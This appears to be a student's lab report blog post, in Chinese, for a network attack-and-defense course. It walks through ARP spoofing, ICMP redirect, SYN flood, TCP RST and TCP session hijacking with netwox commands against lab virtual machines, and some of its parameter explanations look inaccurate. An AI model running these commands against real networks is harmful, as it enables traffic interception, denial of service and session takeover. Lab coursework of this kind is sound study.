20211906 2021-2022-2 《网络攻防实践》第四周作业

1.实践内容

在网络攻防实验环境中完成TCP/IP协议栈重点协议的攻击实验,包括ARP缓存欺骗攻击、ICMP重定向攻击、SYN Flood攻击、TCP RST攻击、TCP会话劫持攻击。

1.1 arp缓存欺骗攻击原理:ARP协议在设计时认为局域网内部的所有用户都是可信的,这使得ARP缓存非常容易被注入伪造的IP地址到MAC地址的映射关系。

1.2 ICMP路由器重定向攻击:利用ICMP路由重定向报文改变主机路由表,向目标主机发送重定向消息,伪装成路由器,使得目标机器的数据报文发送至攻击机从而加强监听。

1.3 TCP SYN Flood拒绝服务攻击:基于TCP三次握手的缺陷,向目标主机发送大量的伪造源地址的SYN连接请求,消耗目标主机的连接队列资源,从而无法正常服务。

1.4 TCP RST攻击:TCP协议头有一个reset,该标志位置为1,接收该数据包的主机即将断开这个TCP会话连接。tcp重置报文就是直接关闭掉一个TCP会话连接。

1.5 TCP会话劫持攻击:TCP会话劫持是劫持通信双方已经建立的TCP会话连接,假冒其中一方的身份,与另一方进行进一步通信。其中最核心的就是通过TCP对会话通信方的验证。

2.实践过程

2.1 ARP缓存欺骗攻击

首先,启动Kali,打开终端,输入sudo apt-get install netwox,安装netwox 。

输入ifconfig查看主机地址和mac地址,主机地址:192.168.192.5 MAC地址:00:0C:29:3f:40:c9

再查看winxp的主机地址和mac地址 192.168.192.3 00:0c:29:E3:AC:1C

输入netwox查看命令帮助
uploading-image-261177.png
选择5-33。注:33号工具可以构造任意的以太网ARP数据报

输入netwox 33 -b 00:0C:29:E3:AC:1C -g 192.168.192.125 -h 00:0c:29:E3:AC:1C -i 192.168.192.3
注:其中,-b 显示网络协议下相关的模块; -g 显示与客户端相关的模块; -h 显示与服务器相关的模块; -i 显示与检测主机连通性相关的模块;
得到结果如下


在winxp靶机中输入arp -a查看它的arp缓存中保存了IP(192.168.192.125)/MAC(00:0C:29:3f:40:c9)这样的映射关系从而达到了欺骗目的。

2.2 ICMP重定向攻击

使用Netwox86号工具进行ICMP重定向攻击
决定用kali攻击windowsattack
kali:192.168.192.5 00:0C:29:3f:40:c9
windowsattack:192.168.192.3 00-0C-29-E3-AC-1C
在kali执行攻击命令netwox86 -f "host 192.168.192.3" -g 192.168.192.5 -i 192.168.192.1。命令参数f代表靶机地址,g代表靶机的下一跳地址,i代表伪造的身份。


在windows上通过route print查看相关路由表信息。

2.3 SYN Flood攻击

使用Netwox76号工具进行SYN Flood攻击
首先使用seedubuntu向windows发送ftp连接,即ftp 192.168.192.3 ,成功。

然后使用kali攻击windows的ftp(21号)端口,即netwox 76 -i IP 192.168.192.3 -p 21 使其关闭

再使用seedubuntu向windows发送ftp连接,即ftp 192.168.192.3 ,发现失败了,攻击成功。

2.4 TCP RST攻击

使用Netwox78号工具进行TCP RST攻击
攻击机kali
靶机seedubuntu
攻击之前靶机可以正常打开网页,并可以通过ftp进行连接,

攻击机kali运行指令netwox 78 -i 192.168.192.2

此时发现靶机不能访问网页了 ftp也断了,攻击成功

2.5 TCP会话劫持

A为kali,B为seed攻击机,C为Linux Metaspioitable靶机
在kali上安装hunt,sudo apt-get install hunt

然后主机B telnet到主机C上,telnet 192.168.192.125

在获取管理员权限,让攻击内容变多

在kali上使用wireshark进行抓包。记录192.168.192.125发送的最后一个ACK包对应的源端口、目的端口、sequence number(raw)、Acknowledgement number(raw)。


通过指令netwox 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.192.5 --ip4-dst 192.168.192.125 --tcp-src 43128 --tcp-dst 23 --tcp-seqnum 4026927949 --tcp-acknum 76944473 --tcp-ack --tcp-psh --tcp-window 64 --tcp-data "2b"伪造包

可以看到发送的山寨包,攻击成功

3.问题

3.1 在使用netwox时出现这个错误


解决:需要管理员权限

3.2 改了主机名以后管理员权限进不去

解决:sudo passwd root 重新设置即可

4.参考资料

https://www.cnblogs.com/wyrr/p/12616557.html

posted @ 2022-04-10 13:24  itumes  阅读(179)  评论(0编辑  收藏  举报